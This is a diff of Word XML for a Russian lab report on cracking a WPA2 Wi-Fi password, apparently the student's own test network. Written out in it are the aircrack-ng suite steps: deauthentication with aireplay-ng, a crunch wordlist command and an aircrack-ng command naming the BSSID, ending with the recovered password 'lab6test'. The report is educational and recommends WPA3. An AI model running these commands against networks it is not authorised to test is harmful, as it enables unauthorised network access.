       </w:r>
       <w:bookmarkEnd w:id="9"/>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Результат: В окне `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>airodump-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">` появилась надпись "WPA </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:9A:0F:59" в верхней правой части экрана.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Это означает, что WPA2-handshake был успешно перехвачен и сохранён в файл `/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>home</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ububkm/handshake-28.cap`.</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Результат: В окне `airodump-ng` появилась надпись "WPA handshake: 50:D2:F5:9A:0F:59" в верхней правой части экрана.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Это означает, что WPA2-handshake был успешно перехвачен и сохранён в файл `/home/ububkm/handshake-28.cap`.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4398,31 +3794,7 @@
         </w:drawing>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">- Обнаружен 1 потенциальный </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>таргет</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>potential</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>targets</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>- Обнаружен 1 потенциальный таргет (1 potential targets)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4463,7 +3835,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Маска пароля: `%%%%%%%%` (8 цифр)</w:t>
+        <w:t>Маска пароля: `</w:t>
+      </w:r>
+      <w:r>
+        <w:t>@@@%@@@</w:t>
+      </w:r>
+      <w:r>
+        <w:t>` (8 цифр)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4474,15 +3852,75 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="afc"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>crunch 8 8 -t %%%%%%%%%%%% -o /home/ububkm/passwords.txt</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>crunch</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 8 8 -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>@@@%@@@</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>home</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ububkm</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>passwords</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4506,7 +3944,25 @@
         <w:t>t</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> %%%%%%%%%%%%` — маска пароля (% означает цифры 0-9)</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>`</w:t>
+      </w:r>
+      <w:r>
+        <w:t>@@@%@@@</w:t>
+      </w:r>
+      <w:r>
+        <w:t>— маска пароля (% означает цифры 0-9</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, @</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> означает буквы строчные а-я</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4630,13 +4086,13 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72611AC5" wp14:editId="7A62460D">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72611AC5" wp14:editId="03EC5444">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:align>center</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>499110</wp:posOffset>
+              <wp:posOffset>179070</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="5166360" cy="1402080"/>
             <wp:effectExtent l="0" t="0" r="0" b="7620"/>
@@ -4686,17 +4142,6 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:t>Примечание</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Для</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ускорения процесса в реальных условиях была использована более узкая маска или словарь меньшего размера.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4729,23 +4174,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">После перехвата </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и генерации словаря паролей был выполнен подбор пароля с использованием утилиты `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aircrack-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`.</w:t>
+        <w:t>После перехвата handshake и генерации словаря паролей был выполнен подбор пароля с использованием утилиты `aircrack-ng`.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4789,120 +4218,135 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo aircrack-ng -a2 -b </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>50:D2:F5</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:9A:0F:59 -w /home/ububkm/passwords.txt /home/ububkm/handshake-28.cap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Где</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- `-a2` — </w:t>
+      </w:r>
+      <w:r>
+        <w:t>режим</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WPA/WPA2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- `-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>aircrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-ng -a2 -b </w:t>
-      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
+        <w:t>50:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:9A:0F:59 -w /home/ububkm/passwords.txt /home/ububkm/handshake-28.cap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Где</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- `-a2` — </w:t>
-      </w:r>
-      <w:r>
-        <w:t>режим</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WPA/WPA2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- `-b </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>50:D2:F5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">:9A:0F:59` — BSSID </w:t>
+        <w:t>:9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">:59` — </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BSSID</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>целевой</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -4910,60 +4354,82 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- `-w /home/ububkm/passwords.txt` — </w:t>
+      <w:r>
+        <w:t>- `-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>home</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ububkm</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>passwords</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">` — </w:t>
       </w:r>
       <w:r>
         <w:t>путь</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>к</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>файлу</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>со</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>словарём</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -5010,7 +4476,13 @@
         <w:t xml:space="preserve"> handshake</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
@@ -5028,15 +4500,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Aircrack-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> версия 1.7</w:t>
+        <w:t>- Aircrack-ng версия 1.7</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5046,136 +4510,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Обнаружена 1 потенциальная цель (1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>potential</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>targets</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- Выбрана первая сеть как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>таргет</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>- Открыт файл `/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>home</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ububkm/handshake-28.cap`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-декодер EAPOL был сброшен несколько раз (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Resetting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> EAPOL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>decoder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>state</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- Период </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>межкадрового</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> тайм-аута превышен (Inter-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>frame</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>timeout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>period</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>exceeded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>- Обнаружена 1 потенциальная цель (1 potential targets)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Выбрана первая сеть как таргет</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Открыт файл `/home/ububkm/handshake-28.cap`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Handshake-декодер EAPOL был сброшен несколько раз (Resetting EAPOL handshake decoder state)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Период межкадрового тайм-аута превышен (Inter-frame timeout period exceeded)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5326,62 +4681,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>1. Подготовка оборудования: WiFi-адаптер успешно переведён в режим мониторинга с помощью утилиты `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>airmon-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>2. Обнаружение целевой сети: С использованием утилиты `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>airodump-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` была обнаружена целевая сеть "Xiaomi_0F58" с шифрованием WPA2-PSK на канале 3.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">3. Захват </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>1. Подготовка оборудования: WiFi-адаптер успешно переведён в режим мониторинга с помощью утилиты `airmon-ng`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2. Обнаружение целевой сети: С использованием утилиты `airodump-ng` была обнаружена целевая сеть "Xiaomi_0F58" с шифрованием WPA2-PSK на канале 3.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3. Захват handshake</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>: Посредством</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> атаки </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деаутентификации</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> с помощью `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aireplay-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` был успешно перехвачен WPA2-handshake, содержащий зашифрованный пароль сети.</w:t>
+        <w:t xml:space="preserve"> атаки деаутентификации с помощью `aireplay-ng` был успешно перехвачен WPA2-handshake, содержащий зашифрованный пароль сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5394,36 +4712,12 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> утилиты `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crunch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` сгенерирован словарь паролей согласно заданной маске.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>5. Взлом пароля: Утилита `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aircrack-ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">` успешно подобрала пароль "lab6test" методом </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>brute-force</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> перебора словаря со скоростью ~75 ключей/секунду.</w:t>
+        <w:t xml:space="preserve"> утилиты `crunch` сгенерирован словарь паролей согласно заданной маске.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>5. Взлом пароля: Утилита `aircrack-ng` успешно подобрала пароль "lab6test" методом brute-force перебора словаря со скоростью ~75 ключей/секунду.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5438,34 +4732,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Процесс 4-way </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> может быть перехвачен в пассивном режиме</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">- Атака </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деаутентификации</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> позволяет принудительно получить </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>handshake</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Процесс 4-way handshake может быть перехвачен в пассивном режиме</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Атака деаутентификации позволяет принудительно получить handshake</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -5479,15 +4752,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Применение WPA3 вместо WPA2 (защита от </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>offline</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-атак)</w:t>
+        <w:t>- Применение WPA3 вместо WPA2 (защита от offline-атак)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5509,21 +4774,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WPS (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WiFi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Protected Setup)</w:t>
+        <w:t xml:space="preserve"> WPS (WiFi Protected Setup)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5554,133 +4805,77 @@
           <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>Олифер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Олифер В. Г., Олифер Н. А. Компьютерные сети. Принципы, технологии, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> В. Г., </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>протоколы :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>Олифер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> учебник для вузов. – 5-е изд. – СПб</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Н. А. Компьютерные сети. Принципы, технологии, </w:t>
+        <w:t>. :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Питер, 2016. – 992 с.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
